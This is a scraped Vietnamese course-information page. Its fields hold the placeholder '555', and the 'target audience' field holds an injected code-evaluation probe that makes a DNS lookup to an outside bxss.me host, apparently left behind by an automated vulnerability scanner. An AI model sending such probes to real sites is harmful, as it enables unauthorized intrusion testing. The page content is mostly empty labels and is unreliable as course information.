Thông tin khóa học

Mục tiêu chương trình
555
Đối tượng chương trình
".gethostbyname(lc("hitmf"."kvfecgxx60807.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(84).chr(101).chr(66)."
Thông tin chung
555
Giáo trình 1
Giảng viên

555

Các khóa học cùng giảng viên